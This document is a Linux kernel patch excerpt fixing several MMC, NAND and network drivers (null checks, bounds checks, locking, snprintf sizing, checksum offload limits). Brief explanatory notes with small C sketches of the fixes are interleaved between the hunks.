+index 8e22b375247ef..c16dbe64859e6 100644
+--- a/drivers/mmc/host/sdhci_am654.c
++++ b/drivers/mmc/host/sdhci_am654.c
+@@ -597,7 +597,7 @@ static int sdhci_am654_get_otap_delay(struct sdhci_host *host,
+ 		return 0;
+ 	}
+ 
+-	for (i = MMC_TIMING_MMC_HS; i <= MMC_TIMING_MMC_HS400; i++) {
++	for (i = MMC_TIMING_LEGACY; i <= MMC_TIMING_MMC_HS400; i++) {
+ 
+ 		ret = device_property_read_u32(dev, td[i].otap_binding,
+ 					       &sdhci_am654->otap_del_sel[i]);
+diff --git a/drivers/mmc/host/vub300.c b/drivers/mmc/host/vub300.c
+index 7dc0e91dabfc7..05ffd5bf5a6f0 100644
+--- a/drivers/mmc/host/vub300.c
++++ b/drivers/mmc/host/vub300.c
+@@ -2311,6 +2311,7 @@ static int vub300_probe(struct usb_interface *interface,
+ 		vub300->read_only =
+ 			(0x0010 & vub300->system_port_status.port_flags) ? 1 : 0;
+ 	} else {
++		retval = -EINVAL;
+ 		goto error5;
+ 	}
+ 	usb_set_intfdata(interface, vub300);
+diff --git a/drivers/mtd/chips/cfi_cmdset_0001.c b/drivers/mtd/chips/cfi_cmdset_0001.c
+index 54f92d09d9cf4..02aaf09d6f5cd 100644
+--- a/drivers/mtd/chips/cfi_cmdset_0001.c
++++ b/drivers/mtd/chips/cfi_cmdset_0001.c
+@@ -421,9 +421,25 @@ read_pri_intelext(struct map_info *map, __u16 adr)
+ 		extra_size = 0;
+ 
+ 		/* Protection Register info */
+-		if (extp->NumProtectionFields)
++		if (extp->NumProtectionFields) {
++			struct cfi_intelext_otpinfo *otp =
++				(struct cfi_intelext_otpinfo *)&extp->extra[0];
++
+ 			extra_size += (extp->NumProtectionFields - 1) *
+-				      sizeof(struct cfi_intelext_otpinfo);
++				sizeof(struct cfi_intelext_otpinfo);
++
++			if (extp_size >= sizeof(*extp) + extra_size) {
++				int i;
++
++				/* Do some byteswapping if necessary */
++				for (i = 0; i < extp->NumProtectionFields - 1; i++) {
++					otp->ProtRegAddr = le32_to_cpu(otp->ProtRegAddr);
++					otp->FactGroups = le16_to_cpu(otp->FactGroups);
++					otp->UserGroups = le16_to_cpu(otp->UserGroups);
++					otp++;
++				}
++			}
++		}
+ 	}
+ 
+ 	if (extp->MinorVersion >= '1') {
+diff --git a/drivers/mtd/nand/raw/intel-nand-controller.c b/drivers/mtd/nand/raw/intel-nand-controller.c
+index 6f4cea81f97c0..1f8a33fb84607 100644
+--- a/drivers/mtd/nand/raw/intel-nand-controller.c
++++ b/drivers/mtd/nand/raw/intel-nand-controller.c
+@@ -619,6 +619,11 @@ static int ebu_nand_probe(struct platform_device *pdev)
+ 	ebu_host->cs_num = cs;
+ 
+ 	resname = devm_kasprintf(dev, GFP_KERNEL, "nand_cs%d", cs);
++	if (!resname) {
++		ret = -ENOMEM;
++		goto err_of_node_put;
++	}
++
+ 	ebu_host->cs[cs].chipaddr = devm_platform_ioremap_resource_byname(pdev,
+ 									  resname);
+ 	if (IS_ERR(ebu_host->cs[cs].chipaddr)) {
+@@ -655,6 +660,11 @@ static int ebu_nand_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	resname = devm_kasprintf(dev, GFP_KERNEL, "addr_sel%d", cs);
++	if (!resname) {
++		ret = -ENOMEM;
++		goto err_cleanup_dma;
++	}
++
+ 	res = platform_get_resource_byname(pdev, IORESOURCE_MEM, resname);
+ 	if (!res) {
+ 		ret = -EINVAL;
+diff --git a/drivers/mtd/nand/raw/meson_nand.c b/drivers/mtd/nand/raw/meson_nand.c
+index ac4947f720478..0aeac8ccbd0ee 100644
+--- a/drivers/mtd/nand/raw/meson_nand.c
++++ b/drivers/mtd/nand/raw/meson_nand.c
+@@ -1021,6 +1021,9 @@ static int meson_nfc_clk_init(struct meson_nfc *nfc)
+ 	init.name = devm_kasprintf(nfc->dev,
+ 				   GFP_KERNEL, "%s#div",
+ 				   dev_name(nfc->dev));
++	if (!init.name)
++		return -ENOMEM;
++
+ 	init.ops = &clk_divider_ops;
+ 	nfc_divider_parent_data[0].fw_name = "device";
+ 	init.parent_data = nfc_divider_parent_data;
+diff --git a/drivers/mtd/nand/raw/tegra_nand.c b/drivers/mtd/nand/raw/tegra_nand.c
+index a9b9031ce6167..d33030b68ac44 100644
+--- a/drivers/mtd/nand/raw/tegra_nand.c
++++ b/drivers/mtd/nand/raw/tegra_nand.c
+@@ -1197,6 +1197,10 @@ static int tegra_nand_probe(struct platform_device *pdev)
+ 	init_completion(&ctrl->dma_complete);
+ 
+ 	ctrl->irq = platform_get_irq(pdev, 0);
++	if (ctrl->irq < 0) {
++		err = ctrl->irq;
++		goto err_put_pm;
++	}
+ 	err = devm_request_irq(&pdev->dev, ctrl->irq, tegra_nand_irq, 0,
+ 			       dev_name(&pdev->dev), ctrl);
+ 	if (err) {
+diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
+index b170a3d8d007e..710734a5af9bf 100644
+--- a/drivers/net/bonding/bond_main.c
++++ b/drivers/net/bonding/bond_main.c
+@@ -1503,6 +1503,10 @@ done:
+ static void bond_setup_by_slave(struct net_device *bond_dev,
+ 				struct net_device *slave_dev)
+ {
++	bool was_up = !!(bond_dev->flags & IFF_UP);
++
++	dev_close(bond_dev);
++
+ 	bond_dev->header_ops	    = slave_dev->header_ops;
+ 
+ 	bond_dev->type		    = slave_dev->type;
+@@ -1517,6 +1521,8 @@ static void bond_setup_by_slave(struct net_device *bond_dev,
+ 		bond_dev->flags &= ~(IFF_BROADCAST | IFF_MULTICAST);
+ 		bond_dev->flags |= (IFF_POINTOPOINT | IFF_NOARP);
+ 	}
++	if (was_up)
++		dev_open(bond_dev, NULL);
+ }
+ 
+ /* On bonding slaves other than the currently active slave, suppress
+diff --git a/drivers/net/dsa/lan9303_mdio.c b/drivers/net/dsa/lan9303_mdio.c
+index 4f33369a2de52..47484f55e2aba 100644
+--- a/drivers/net/dsa/lan9303_mdio.c
++++ b/drivers/net/dsa/lan9303_mdio.c
+@@ -32,7 +32,7 @@ static int lan9303_mdio_write(void *ctx, uint32_t reg, uint32_t val)
+ 	struct lan9303_mdio *sw_dev = (struct lan9303_mdio *)ctx;
+ 
+ 	reg <<= 2; /* reg num to offset */
+-	mutex_lock(&sw_dev->device->bus->mdio_lock);
++	mutex_lock_nested(&sw_dev->device->bus->mdio_lock, MDIO_MUTEX_NESTED);
+ 	lan9303_mdio_real_write(sw_dev->device, reg, val & 0xffff);
+ 	lan9303_mdio_real_write(sw_dev->device, reg + 2, (val >> 16) & 0xffff);
+ 	mutex_unlock(&sw_dev->device->bus->mdio_lock);
+@@ -50,7 +50,7 @@ static int lan9303_mdio_read(void *ctx, uint32_t reg, uint32_t *val)
+ 	struct lan9303_mdio *sw_dev = (struct lan9303_mdio *)ctx;
+ 
+ 	reg <<= 2; /* reg num to offset */
+-	mutex_lock(&sw_dev->device->bus->mdio_lock);
++	mutex_lock_nested(&sw_dev->device->bus->mdio_lock, MDIO_MUTEX_NESTED);
+ 	*val = lan9303_mdio_real_read(sw_dev->device, reg);
+ 	*val |= (lan9303_mdio_real_read(sw_dev->device, reg + 2) << 16);
+ 	mutex_unlock(&sw_dev->device->bus->mdio_lock);
+diff --git a/drivers/net/ethernet/atheros/atl1c/atl1c.h b/drivers/net/ethernet/atheros/atl1c/atl1c.h
+index 43d821fe7a542..63ba64dbb7310 100644
+--- a/drivers/net/ethernet/atheros/atl1c/atl1c.h
++++ b/drivers/net/ethernet/atheros/atl1c/atl1c.h
+@@ -504,15 +504,12 @@ struct atl1c_rrd_ring {
+ 	u16 next_to_use;
+ 	u16 next_to_clean;
+ 	struct napi_struct napi;
+-	struct page *rx_page;
+-	unsigned int rx_page_offset;
+ };
+ 
+ /* board specific private data structure */
+ struct atl1c_adapter {
+ 	struct net_device   *netdev;
+ 	struct pci_dev      *pdev;
+-	unsigned int	    rx_frag_size;
+ 	struct atl1c_hw        hw;
+ 	struct atl1c_hw_stats  hw_stats;
+ 	struct mii_if_info  mii;    /* MII interface info */
+diff --git a/drivers/net/ethernet/atheros/atl1c/atl1c_main.c b/drivers/net/ethernet/atheros/atl1c/atl1c_main.c
+index 7762e532c6a4f..6eb86d75955fe 100644
+--- a/drivers/net/ethernet/atheros/atl1c/atl1c_main.c
++++ b/drivers/net/ethernet/atheros/atl1c/atl1c_main.c
+@@ -493,15 +493,10 @@ static int atl1c_set_mac_addr(struct net_device *netdev, void *p)
+ static void atl1c_set_rxbufsize(struct atl1c_adapter *adapter,
+ 				struct net_device *dev)
+ {
+-	unsigned int head_size;
+ 	int mtu = dev->mtu;
+ 
+ 	adapter->rx_buffer_len = mtu > AT_RX_BUF_SIZE ?
+ 		roundup(mtu + ETH_HLEN + ETH_FCS_LEN + VLAN_HLEN, 8) : AT_RX_BUF_SIZE;
+-
+-	head_size = SKB_DATA_ALIGN(adapter->rx_buffer_len + NET_SKB_PAD + NET_IP_ALIGN) +
+-		    SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
+-	adapter->rx_frag_size = roundup_pow_of_two(head_size);
+ }
+ 
+ static netdev_features_t atl1c_fix_features(struct net_device *netdev,
+@@ -974,7 +969,6 @@ static void atl1c_init_ring_ptrs(struct atl1c_adapter *adapter)
+ static void atl1c_free_ring_resources(struct atl1c_adapter *adapter)
+ {
+ 	struct pci_dev *pdev = adapter->pdev;
+-	int i;
+ 
+ 	dma_free_coherent(&pdev->dev, adapter->ring_header.size,
+ 			  adapter->ring_header.desc, adapter->ring_header.dma);
+@@ -987,12 +981,6 @@ static void atl1c_free_ring_resources(struct atl1c_adapter *adapter)
+ 		kfree(adapter->tpd_ring[0].buffer_info);
+ 		adapter->tpd_ring[0].buffer_info = NULL;
+ 	}
+-	for (i = 0; i < adapter->rx_queue_count; ++i) {
+-		if (adapter->rrd_ring[i].rx_page) {
+-			put_page(adapter->rrd_ring[i].rx_page);
+-			adapter->rrd_ring[i].rx_page = NULL;
+-		}
+-	}
+ }
+ 
+ /**
+@@ -1764,48 +1752,11 @@ static inline void atl1c_rx_checksum(struct atl1c_adapter *adapter,
+ 	skb_checksum_none_assert(skb);
+ }
+ 
+-static struct sk_buff *atl1c_alloc_skb(struct atl1c_adapter *adapter,
+-				       u32 queue, bool napi_mode)
+-{
+-	struct atl1c_rrd_ring *rrd_ring = &adapter->rrd_ring[queue];
+-	struct sk_buff *skb;
+-	struct page *page;
+-
+-	if (adapter->rx_frag_size > PAGE_SIZE) {
+-		if (likely(napi_mode))
+-			return napi_alloc_skb(&rrd_ring->napi,
+-					      adapter->rx_buffer_len);
+-		else
+-			return netdev_alloc_skb_ip_align(adapter->netdev,
+-							 adapter->rx_buffer_len);
+-	}
+-
+-	page = rrd_ring->rx_page;
+-	if (!page) {
+-		page = alloc_page(GFP_ATOMIC);
+-		if (unlikely(!page))
+-			return NULL;
+-		rrd_ring->rx_page = page;
+-		rrd_ring->rx_page_offset = 0;
+-	}
+-
+-	skb = build_skb(page_address(page) + rrd_ring->rx_page_offset,
+-			adapter->rx_frag_size);
+-	if (likely(skb)) {
+-		skb_reserve(skb, NET_SKB_PAD + NET_IP_ALIGN);
+-		rrd_ring->rx_page_offset += adapter->rx_frag_size;
+-		if (rrd_ring->rx_page_offset >= PAGE_SIZE)
+-			rrd_ring->rx_page = NULL;
+-		else
+-			get_page(page);
+-	}
+-	return skb;
+-}
+-
+ static int atl1c_alloc_rx_buffer(struct atl1c_adapter *adapter, u32 queue,
+ 				 bool napi_mode)
+ {
+ 	struct atl1c_rfd_ring *rfd_ring = &adapter->rfd_ring[queue];
++	struct atl1c_rrd_ring *rrd_ring = &adapter->rrd_ring[queue];
+ 	struct pci_dev *pdev = adapter->pdev;
+ 	struct atl1c_buffer *buffer_info, *next_info;
+ 	struct sk_buff *skb;
+@@ -1824,13 +1775,27 @@ static int atl1c_alloc_rx_buffer(struct atl1c_adapter *adapter, u32 queue,
+ 	while (next_info->flags & ATL1C_BUFFER_FREE) {
+ 		rfd_desc = ATL1C_RFD_DESC(rfd_ring, rfd_next_to_use);
+ 
+-		skb = atl1c_alloc_skb(adapter, queue, napi_mode);
++		/* When the DMA RX address is set to something like
++		 * 0x....fc0, it is very likely to cause a DMA
++		 * RFD overflow issue.
++		 *
++		 * To work around it, we allocate the rx skb with 64
++		 * bytes of extra space, and offset the address whenever
++		 * 0x....fc0 is detected.
++		 */
++		if (likely(napi_mode))
++			skb = napi_alloc_skb(&rrd_ring->napi, adapter->rx_buffer_len + 64);
++		else
++			skb = netdev_alloc_skb(adapter->netdev, adapter->rx_buffer_len + 64);
+ 		if (unlikely(!skb)) {
+ 			if (netif_msg_rx_err(adapter))
+ 				dev_warn(&pdev->dev, "alloc rx buffer failed\n");
+ 			break;
+ 		}
+ 
++		if (((unsigned long)skb->data & 0xfff) == 0xfc0)
++			skb_reserve(skb, 64);
++
+ 		/*
+ 		 * Make buffer alignment 2 beyond a 16 byte boundary
+ 		 * this will result in a 16 byte aligned IP header after
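
The workaround above over-allocates each receive buffer by 64 bytes and steps past the problematic alignment whenever the buffer happens to land on an address whose low 12 bits are 0xfc0. A malloc()-based sketch of the same offsetting (to_free keeps the original pointer so it can still be freed):

#include <stdint.h>
#include <stdlib.h>

static void *alloc_rx_buf(size_t len, void **to_free)
{
        char *buf = malloc(len + 64);   /* 64 bytes of slack */

        if (!buf)
                return NULL;
        *to_free = buf;

        if (((uintptr_t)buf & 0xfff) == 0xfc0)
                buf += 64;              /* mirrors skb_reserve(skb, 64) */
        return buf;
}
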
+diff --git a/drivers/net/ethernet/cortina/gemini.c b/drivers/net/ethernet/cortina/gemini.c
+index fdf10318758b4..7c0b0bc033c9c 100644
+--- a/drivers/net/ethernet/cortina/gemini.c
++++ b/drivers/net/ethernet/cortina/gemini.c
+@@ -432,8 +432,8 @@ static const struct gmac_max_framelen gmac_maxlens[] = {
+ 		.val = CONFIG0_MAXLEN_1536,
+ 	},
+ 	{
+-		.max_l3_len = 1542,
+-		.val = CONFIG0_MAXLEN_1542,
++		.max_l3_len = 1548,
++		.val = CONFIG0_MAXLEN_1548,
+ 	},
+ 	{
+ 		.max_l3_len = 9212,
+@@ -1145,6 +1145,7 @@ static int gmac_map_tx_bufs(struct net_device *netdev, struct sk_buff *skb,
+ 	dma_addr_t mapping;
+ 	unsigned short mtu;
+ 	void *buffer;
++	int ret;
+ 
+ 	mtu  = ETH_HLEN;
+ 	mtu += netdev->mtu;
+@@ -1159,9 +1160,30 @@ static int gmac_map_tx_bufs(struct net_device *netdev, struct sk_buff *skb,
+ 		word3 |= mtu;
+ 	}
+ 
+-	if (skb->ip_summed != CHECKSUM_NONE) {
++	if (skb->len >= ETH_FRAME_LEN) {
++		/* Hardware offloaded checksumming isn't working on frames
++		 * bigger than 1514 bytes. A hypothesis about this is that the
++		 * checksum buffer is only 1518 bytes, so when the frames get
++		 * bigger they get truncated, or the last few bytes get
++		 * overwritten by the FCS.
++		 *
++		 * Just use software checksumming and bypass on bigger frames.
++		 */
++		if (skb->ip_summed == CHECKSUM_PARTIAL) {
++			ret = skb_checksum_help(skb);
++			if (ret)
++				return ret;
++		}
++		word1 |= TSS_BYPASS_BIT;
++	} else if (skb->ip_summed == CHECKSUM_PARTIAL) {
+ 		int tcp = 0;
+ 
++		/* We do not switch off the checksumming on non-TCP/UDP
++		 * frames: as tests show, the checksumming engine is
++		 * smart enough to see that a frame is not actually TCP
++		 * or UDP and just passes it through without any changes
++		 * to the frame.
++		 */
+ 		if (skb->protocol == htons(ETH_P_IP)) {
+ 			word1 |= TSS_IP_CHKSUM_BIT;
+ 			tcp = ip_hdr(skb)->protocol == IPPROTO_TCP;
+@@ -1978,15 +2000,6 @@ static int gmac_change_mtu(struct net_device *netdev, int new_mtu)
+ 	return 0;
+ }
+ 
+-static netdev_features_t gmac_fix_features(struct net_device *netdev,
+-					   netdev_features_t features)
+-{
+-	if (netdev->mtu + ETH_HLEN + VLAN_HLEN > MTU_SIZE_BIT_MASK)
+-		features &= ~GMAC_OFFLOAD_FEATURES;
+-
+-	return features;
+-}
+-
+ static int gmac_set_features(struct net_device *netdev,
+ 			     netdev_features_t features)
+ {
+@@ -2212,7 +2225,6 @@ static const struct net_device_ops gmac_351x_ops = {
+ 	.ndo_set_mac_address	= gmac_set_mac_address,
+ 	.ndo_get_stats64	= gmac_get_stats64,
+ 	.ndo_change_mtu		= gmac_change_mtu,
+-	.ndo_fix_features	= gmac_fix_features,
+ 	.ndo_set_features	= gmac_set_features,
+ };
+ 
+@@ -2464,11 +2476,12 @@ static int gemini_ethernet_port_probe(struct platform_device *pdev)
+ 
+ 	netdev->hw_features = GMAC_OFFLOAD_FEATURES;
+ 	netdev->features |= GMAC_OFFLOAD_FEATURES | NETIF_F_GRO;
+-	/* We can handle jumbo frames up to 10236 bytes so, let's accept
+-	 * payloads of 10236 bytes minus VLAN and ethernet header
++	/* We can receive jumbo frames up to 10236 bytes but only
++	 * transmit 2047 bytes, so let's accept payloads of 2047
++	 * bytes minus the VLAN and Ethernet header
++	 */
+ 	netdev->min_mtu = ETH_MIN_MTU;
+-	netdev->max_mtu = 10236 - VLAN_ETH_HLEN;
++	netdev->max_mtu = MTU_SIZE_BIT_MASK - VLAN_ETH_HLEN;
+ 
+ 	port->freeq_refill = 0;
+ 	netif_napi_add(netdev, &port->napi, gmac_napi_poll);
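
For frames over 1514 bytes the hunk sets TSS_BYPASS_BIT and falls back to skb_checksum_help(), i.e. the stack computes the ones'-complement Internet checksum in software. For reference, that checksum (RFC 1071) in standalone form:

#include <stdint.h>
#include <stddef.h>

static uint16_t inet_csum(const void *data, size_t len)
{
        const uint8_t *p = data;
        uint32_t sum = 0;

        while (len > 1) {
                sum += (uint32_t)p[0] << 8 | p[1];
                p += 2;
                len -= 2;
        }
        if (len)                        /* odd trailing byte */
                sum += (uint32_t)p[0] << 8;
        while (sum >> 16)               /* fold the carries back in */
                sum = (sum & 0xffff) + (sum >> 16);
        return (uint16_t)~sum;
}

int main(void)
{
        const uint8_t hdr[4] = { 0x45, 0x00, 0x00, 0x1c };

        return inet_csum(hdr, sizeof(hdr)) == 0xbae3 ? 0 : 1;
}
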
+diff --git a/drivers/net/ethernet/cortina/gemini.h b/drivers/net/ethernet/cortina/gemini.h
+index 9fdf77d5eb374..24bb989981f23 100644
+--- a/drivers/net/ethernet/cortina/gemini.h
++++ b/drivers/net/ethernet/cortina/gemini.h
+@@ -502,7 +502,7 @@ union gmac_txdesc_3 {
+ #define SOF_BIT			0x80000000
+ #define EOF_BIT			0x40000000
+ #define EOFIE_BIT		BIT(29)
+-#define MTU_SIZE_BIT_MASK	0x1fff
++#define MTU_SIZE_BIT_MASK	0x7ff /* Max MTU 2047 bytes */
+ 
+ /* GMAC Tx Descriptor */
+ struct gmac_txdesc {
+@@ -787,7 +787,7 @@ union gmac_config0 {
+ #define  CONFIG0_MAXLEN_1536	0
+ #define  CONFIG0_MAXLEN_1518	1
+ #define  CONFIG0_MAXLEN_1522	2
+-#define  CONFIG0_MAXLEN_1542	3
++#define  CONFIG0_MAXLEN_1548	3
+ #define  CONFIG0_MAXLEN_9k	4	/* 9212 */
+ #define  CONFIG0_MAXLEN_10k	5	/* 10236 */
+ #define  CONFIG0_MAXLEN_1518__6	6
+diff --git a/drivers/net/ethernet/engleder/tsnep.h b/drivers/net/ethernet/engleder/tsnep.h
+index 09a723b827c77..0a0d3d7ba63b3 100644
+--- a/drivers/net/ethernet/engleder/tsnep.h
++++ b/drivers/net/ethernet/engleder/tsnep.h
+@@ -123,7 +123,7 @@ struct tsnep_rx {
+ 
+ struct tsnep_queue {
+ 	struct tsnep_adapter *adapter;
+-	char name[IFNAMSIZ + 9];
++	char name[IFNAMSIZ + 16];
+ 
+ 	struct tsnep_tx *tx;
+ 	struct tsnep_rx *rx;
+diff --git a/drivers/net/ethernet/engleder/tsnep_main.c b/drivers/net/ethernet/engleder/tsnep_main.c
+index 2be518db04270..c86dfbce787f1 100644
+--- a/drivers/net/ethernet/engleder/tsnep_main.c
++++ b/drivers/net/ethernet/engleder/tsnep_main.c
+@@ -973,14 +973,14 @@ static int tsnep_request_irq(struct tsnep_queue *queue, bool first)
+ 		dev = queue->adapter;
+ 	} else {
+ 		if (queue->tx && queue->rx)
+-			sprintf(queue->name, "%s-txrx-%d", name,
+-				queue->rx->queue_index);
++			snprintf(queue->name, sizeof(queue->name), "%s-txrx-%d",
++				 name, queue->rx->queue_index);
+ 		else if (queue->tx)
+-			sprintf(queue->name, "%s-tx-%d", name,
+-				queue->tx->queue_index);
++			snprintf(queue->name, sizeof(queue->name), "%s-tx-%d",
++				 name, queue->tx->queue_index);
+ 		else
+-			sprintf(queue->name, "%s-rx-%d", name,
+-				queue->rx->queue_index);
++			snprintf(queue->name, sizeof(queue->name), "%s-rx-%d",
++				 name, queue->rx->queue_index);
+ 		handler = tsnep_irq_txrx;
+ 		dev = queue;
+ 	}
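
The buffer grows from IFNAMSIZ + 9 to IFNAMSIZ + 16 because the worst case of "%s-txrx-%d" is an IFNAMSIZ - 1 byte name, the 6-byte "-txrx-" infix, up to 10 digits of int index, and the terminating NUL: 32 bytes. Switching to snprintf() additionally turns any future miscount into truncation instead of a stack overflow. A quick demonstration (the interface name is made up):

#include <stdio.h>

#define IFNAMSIZ 16

int main(void)
{
        char name[IFNAMSIZ + 16];
        int n = snprintf(name, sizeof(name), "%s-txrx-%d",
                         "enp0s31f6abcdef", 2147483647);

        printf("%d bytes needed, buffer holds %zu\n", n, sizeof(name));
        return 0;       /* prints: 31 bytes needed, buffer holds 32 */
}
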
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c b/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c
+index 00eed9835cb55..d2603cfc122c8 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c
+@@ -494,11 +494,14 @@ static void hns3_get_coal_info(struct hns3_enet_tqp_vector *tqp_vector,
+ 	}
+ 
+ 	sprintf(result[j++], "%d", i);
+-	sprintf(result[j++], "%s", dim_state_str[dim->state]);
++	sprintf(result[j++], "%s", dim->state < ARRAY_SIZE(dim_state_str) ?
++		dim_state_str[dim->state] : "unknown");
+ 	sprintf(result[j++], "%u", dim->profile_ix);
+-	sprintf(result[j++], "%s", dim_cqe_mode_str[dim->mode]);
++	sprintf(result[j++], "%s", dim->mode < ARRAY_SIZE(dim_cqe_mode_str) ?
++		dim_cqe_mode_str[dim->mode] : "unknown");
+ 	sprintf(result[j++], "%s",
+-		dim_tune_stat_str[dim->tune_state]);
++		dim->tune_state < ARRAY_SIZE(dim_tune_stat_str) ?
++		dim_tune_stat_str[dim->tune_state] : "unknown");
+ 	sprintf(result[j++], "%u", dim->steps_left);
+ 	sprintf(result[j++], "%u", dim->steps_right);
+ 	sprintf(result[j++], "%u", dim->tired);
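
Each table lookup above gains a range check so a state reported by newer firmware cannot index past the string arrays. Generic form of the guard (the table contents here are made up for illustration):

#include <stdio.h>

#define ARRAY_SIZE(a)   (sizeof(a) / sizeof((a)[0]))

static const char * const dim_state_str[] = { "start", "in_prog", "apply" };

static const char *dim_state_name(unsigned int state)
{
        return state < ARRAY_SIZE(dim_state_str) ?
               dim_state_str[state] : "unknown";
}

int main(void)
{
        printf("%s %s\n", dim_state_name(1), dim_state_name(7));
        return 0;       /* prints: in_prog unknown */
}
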
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c b/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
+index 04c9baca1b0f8..5ad22b815b2f0 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
+@@ -5139,7 +5139,7 @@ static int hns3_init_mac_addr(struct net_device *netdev)
+ 	struct hns3_nic_priv *priv = netdev_priv(netdev);
+ 	char format_mac_addr[HNAE3_FORMAT_MAC_ADDR_LEN];
+ 	struct hnae3_handle *h = priv->ae_handle;
+-	u8 mac_addr_temp[ETH_ALEN];
++	u8 mac_addr_temp[ETH_ALEN] = {0};
+ 	int ret = 0;
+ 
+ 	if (h->ae_algo->ops->get_mac_addr)
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+index 3e1d202d60ce1..48b0cb5ec5d29 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+@@ -74,6 +74,7 @@ static void hclge_sync_fd_table(struct hclge_dev *hdev);
+ static void hclge_update_fec_stats(struct hclge_dev *hdev);
+ static int hclge_mac_link_status_wait(struct hclge_dev *hdev, int link_ret,
+ 				      int wait_cnt);
++static int hclge_update_port_info(struct hclge_dev *hdev);
+ 
+ static struct hnae3_ae_algo ae_algo;
+ 
+@@ -3141,6 +3142,9 @@ static void hclge_update_link_status(struct hclge_dev *hdev)
+ 
+ 	if (state != hdev->hw.mac.link) {
+ 		hdev->hw.mac.link = state;
++		if (state == HCLGE_LINK_STATUS_UP)
++			hclge_update_port_info(hdev);
++
+ 		client->ops->link_status_change(handle, state);
+ 		hclge_config_mac_tnl_int(hdev, state);
+ 		if (rclient && rclient->ops->link_status_change)
+@@ -10132,8 +10136,6 @@ static void hclge_rm_vport_vlan_table(struct hclge_vport *vport, u16 vlan_id,
+ 	struct hclge_vport_vlan_cfg *vlan, *tmp;
+ 	struct hclge_dev *hdev = vport->back;
+ 
+-	mutex_lock(&hdev->vport_lock);
+-
+ 	list_for_each_entry_safe(vlan, tmp, &vport->vlan_list, node) {
+ 		if (vlan->vlan_id == vlan_id) {
+ 			if (is_write_tbl && vlan->hd_tbl_status)
+@@ -10148,8 +10150,6 @@ static void hclge_rm_vport_vlan_table(struct hclge_vport *vport, u16 vlan_id,
+ 			break;
+ 		}
+ 	}
+-
+-	mutex_unlock(&hdev->vport_lock);
+ }
+ 
+ void hclge_rm_vport_all_vlan_table(struct hclge_vport *vport, bool is_del_list)
+@@ -10558,11 +10558,16 @@ int hclge_set_vlan_filter(struct hnae3_handle *handle, __be16 proto,
+ 	 * handle mailbox. Just record the vlan id, and remove it after
+ 	 * reset finished.
+ 	 */
++	mutex_lock(&hdev->vport_lock);
+ 	if ((test_bit(HCLGE_STATE_RST_HANDLING, &hdev->state) ||
+ 	     test_bit(HCLGE_STATE_RST_FAIL, &hdev->state)) && is_kill) {
+ 		set_bit(vlan_id, vport->vlan_del_fail_bmap);
++		mutex_unlock(&hdev->vport_lock);
+ 		return -EBUSY;
++	} else if (!is_kill && test_bit(vlan_id, vport->vlan_del_fail_bmap)) {
++		clear_bit(vlan_id, vport->vlan_del_fail_bmap);
+ 	}
++	mutex_unlock(&hdev->vport_lock);
+ 
+ 	/* when port base vlan enabled, we use port base vlan as the vlan
+ 	 * filter entry. In this case, we don't update vlan filter table
+@@ -10577,17 +10582,22 @@ int hclge_set_vlan_filter(struct hnae3_handle *handle, __be16 proto,
+ 	}
+ 
+ 	if (!ret) {
+-		if (!is_kill)
++		if (!is_kill) {
+ 			hclge_add_vport_vlan_table(vport, vlan_id,
+ 						   writen_to_tbl);
+-		else if (is_kill && vlan_id != 0)
++		} else if (is_kill && vlan_id != 0) {
++			mutex_lock(&hdev->vport_lock);
+ 			hclge_rm_vport_vlan_table(vport, vlan_id, false);
++			mutex_unlock(&hdev->vport_lock);
++		}
+ 	} else if (is_kill) {
+ 		/* when remove hw vlan filter failed, record the vlan id,
+ 		 * and try to remove it from hw later, to be consistence
+ 		 * with stack
+ 		 */
++		mutex_lock(&hdev->vport_lock);
+ 		set_bit(vlan_id, vport->vlan_del_fail_bmap);
++		mutex_unlock(&hdev->vport_lock);
+ 	}
+ 
+ 	hclge_set_vport_vlan_fltr_change(vport);
+@@ -10627,6 +10637,7 @@ static void hclge_sync_vlan_filter(struct hclge_dev *hdev)
+ 	int i, ret, sync_cnt = 0;
+ 	u16 vlan_id;
+ 
++	mutex_lock(&hdev->vport_lock);
+ 	/* start from vport 1 for PF is always alive */
+ 	for (i = 0; i < hdev->num_alloc_vport; i++) {
+ 		struct hclge_vport *vport = &hdev->vport[i];
+@@ -10637,21 +10648,26 @@ static void hclge_sync_vlan_filter(struct hclge_dev *hdev)
+ 			ret = hclge_set_vlan_filter_hw(hdev, htons(ETH_P_8021Q),
+ 						       vport->vport_id, vlan_id,
+ 						       true);
+-			if (ret && ret != -EINVAL)
++			if (ret && ret != -EINVAL) {
++				mutex_unlock(&hdev->vport_lock);
+ 				return;
++			}
+ 
+ 			clear_bit(vlan_id, vport->vlan_del_fail_bmap);
+ 			hclge_rm_vport_vlan_table(vport, vlan_id, false);
+ 			hclge_set_vport_vlan_fltr_change(vport);
+ 
+ 			sync_cnt++;
+-			if (sync_cnt >= HCLGE_MAX_SYNC_COUNT)
++			if (sync_cnt >= HCLGE_MAX_SYNC_COUNT) {
++				mutex_unlock(&hdev->vport_lock);
+ 				return;
++			}
+ 
+ 			vlan_id = find_first_bit(vport->vlan_del_fail_bmap,
+ 						 VLAN_N_VID);
+ 		}
+ 	}
++	mutex_unlock(&hdev->vport_lock);
+ 
+ 	hclge_sync_vlan_fltr_state(hdev);
+ }
+@@ -11642,6 +11658,7 @@ static int hclge_init_ae_dev(struct hnae3_ae_dev *ae_dev)
+ 		goto err_msi_irq_uninit;
+ 
+ 	if (hdev->hw.mac.media_type == HNAE3_MEDIA_TYPE_COPPER) {
++		clear_bit(HNAE3_DEV_SUPPORT_FEC_B, ae_dev->caps);
+ 		if (hnae3_dev_phy_imp_supported(hdev))
